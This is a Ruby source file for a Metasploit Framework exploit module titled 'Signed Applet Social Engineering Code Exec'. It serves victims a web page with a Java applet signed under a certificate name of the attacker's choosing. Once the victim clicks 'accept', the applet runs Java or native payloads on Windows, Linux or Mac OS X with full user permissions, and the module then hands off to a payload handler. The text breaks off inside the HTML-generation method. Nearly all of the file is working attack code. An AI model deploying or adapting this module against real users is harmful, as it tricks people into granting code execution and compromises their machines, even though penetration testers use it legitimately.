## # $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Java include Msf::Exploit::EXE def initialize( info = {} ) super( update_info( info, 'Name' => 'Signed Applet Social Engineering Code Exec', 'Description' => %q{ This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it to a .jar file, then signs the .jar with a dynamically created certificate containing values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. The user's JVM pops a dialog asking if they trust the signed applet and displays the values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload created for the CVE-2008-5353 java deserialization exploit. This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If these dependencies are not present, the exploit falls back to a static, signed JAR. }, 'License' => MSF_LICENSE, 'Author' => [ 'natron' ], 'Version' => '$Revision: 11516 $', 'References' => [ [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ], 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], [ 'Mac OS X PPC (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ] ], 'DefaultTarget' => 1 )) register_options( [ OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), #OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), # Not implemented yet. #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), # Needs Rex::Zip to be able to crack zip files #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), ], self.class) # No source right now, so don't give an option to save it #register_advanced_options( # [ # OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]) # ], self.class) end def exploit # # Currently doing all processing in on_request_uri. # If this is too slow, we can move applet generation up here. # @use_static = false if not @jvm_init print_error print_error "The JDK failed to initialized: #{@java_error}" print_error "In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable." print_error print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." print_error @use_static = true else cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java") compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ]) applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class") @compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) } end super end def on_request_uri( cli, request ) payload = regenerate_payload(cli) if not payload print_error( "Failed to generate the payload." ) # Send them a 404 so the browser doesn't hang waiting for data # that will never come. send_not_found(cli) return end if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect( cli, get_resource() + '/', '') return end print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." ) send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end # If we haven't returned yet, then this is a request for our applet # jar, build one for this victim. jar = payload.encoded_jar if @use_static # Then build from the statically signed class files. Note that # this uses a pre-compiled version of Payload.class, so any new # updates to that file in the normal javapayload will not be # reflected here! applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class") applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) } jar.add_file("SiteLoader.class", applet_data) print_status("Building statically signed jar for #{cli.peerhost}") build_static_sig(jar) data = jar.to_s else # Then build from the class file we compiled in the exploit() # method above. jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data) print_status("Signing file for #{cli.peerhost}") # The RJB signing class requires the jar to be an actual file on # the filesystem, write it out. File.open(File.join(datastore["JavaCache"], "tmp.jar"), 'wb') { |f| f.write(jar.to_s) } sign_jar(datastore["CERTCN"], "tmp.jar", "signed.jar") # ... and read in the resulting signed jar data = File.open(File.join(datastore["JavaCache"], "signed.jar"), "rb") { |f| f.read(f.stat.size) } end print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, data.to_s, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = %Q|
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